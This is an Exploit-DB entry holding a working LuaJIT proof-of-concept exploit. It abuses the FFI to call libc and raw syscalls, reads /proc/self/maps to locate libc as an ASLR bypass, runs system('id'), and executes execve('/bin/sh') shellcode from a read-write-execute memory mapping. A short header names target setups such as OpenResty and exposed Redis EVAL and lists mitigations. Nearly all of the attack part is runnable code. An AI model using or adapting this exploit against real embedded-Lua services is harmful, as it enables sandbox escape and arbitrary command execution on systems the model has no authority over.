LuaJIT 2.1.1774638290 - Arbitrary Code Execution

EDB-ID:

52554

CVE:

N/A

EDB Verified:

Author:

Taurus Omar

Type:

webapps

Exploit: /

Platform:

Multiple

Date:

2026-05-07

Vulnerable App:

-- Exploit Title: LuaJIT 2.1.1774638290 - Arbitrary Code Execution 
-- Date: 2026-03-29
-- Exploit Author: TaurusOmar
-- Vendor Homepage: https://luajit.org/
-- Software Link: https://luajit.org/download.html
-- Version: LuaJIT 2.1.1774638290 (latest)
-- Tested on: Linux x86-64 (Arch Linux)


-- Description:
-- LuaJIT's Foreign Function Interface (FFI) provides unrestricted access
-- to native C functions including syscall(), mmap(), mprotect() and 
-- arbitrary shared library loading. When FFI is accessible to untrusted
-- Lua code in embedding scenarios (OpenResty, Redis, game engines, IoT),
-- an attacker can achieve arbitrary code execution with full process 
-- privileges including shellcode execution via mmap(RWX)+ffi.copy()+ffi.cast().
--
-- This affects any application embedding LuaJIT 2.1.x without explicitly
-- disabling FFI (-DLUAJIT_DISABLE_FFI) or removing it from the sandbox
-- environment before executing untrusted scripts.
--
-- Verified on LuaJIT 2.1.1774638290 (March 2026) — latest version.
--
-- Attack scenarios:
--   - OpenResty/Nginx with user-controlled Lua scripts
--   - Redis with exposed EVAL interface
--   - Game engines with Lua modding systems
--   - IoT devices with Lua scripting interface
--
-- Mitigation:
--   - Compile with -DLUAJIT_DISABLE_FFI
--   - Remove 'ffi' from sandbox environment table
--   - Apply OS-level restrictions: seccomp-bpf, AppArmor, namespaces

local ffi = require("ffi")
local bit = require("bit")

ffi.cdef[[
    int      getpid(void);
    long     syscall(long number, ...);
    int      system(const char *command);
    void    *mmap(void *addr, size_t length, int prot,
                  int flags, int fd, long offset);
    int      munmap(void *addr, size_t length);
]]

print("=" .. string.rep("=", 55))
print("  LuaJIT 2.1.x - FFI Unrestricted Syscall Access PoC")
print("=" .. string.rep("=", 55))

-- dlsym resolves libc symbols without restriction
local pid_libc = ffi.C.getpid()
print("\n[1] ffi.C.getpid() via dlsym: " .. pid_libc)

-- Direct kernel syscall channel (SYS_getpid = 39 x86-64)
local pid_sc = tonumber(ffi.C.syscall(39))
print("[2] syscall(39) direct:       " .. pid_sc)

if pid_libc == pid_sc then
    print("[+] Both channels confirmed active\n")
end

-- ASLR bypass via /proc/self/maps
local f = io.open("/proc/self/maps", "r")
for line in f:lines() do
    if line:find("libc.so") and line:find("r--p") then
        local base = tonumber("0x" .. line:match("^(%x+)"))
        print("[3] libc base (ASLR bypass): 0x" .. string.format("%x", base))
        break
    end
end
f:close()

-- Arbitrary command execution
print("[4] ffi.C.system('id'):")
ffi.C.system("id")

-- Shellcode execution via mmap(RWX)
print("\n[5] Shellcode execution via mmap(RWX):")
local PROT_RWX  = bit.bor(1, 2, 4)
local MAP_FLAGS = bit.bor(0x02, 0x20)

-- x86-64 execve("/bin/sh", NULL, NULL) - syscall 59
local shellcode =
    "\x48\x31\xd2"
    .. "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
    .. "\x53"
    .. "\x48\x89\xe7"
    .. "\x48\x31\xf6"
    .. "\x48\x31\xc0"
    .. "\xb0\x3b"
    .. "\x0f\x05"

local mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_FLAGS, -1, 0)
if ffi.cast("long", mem) ~= -1 then
    print("    RWX region: 0x" .. string.format("%x", ffi.cast("unsigned long", mem)))
    ffi.copy(mem, shellcode, #shellcode)
    print("    Shellcode written. Executing execve('/bin/sh')...")
    local fn = ffi.cast("void(*)(void)", mem)
    fn()
end

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services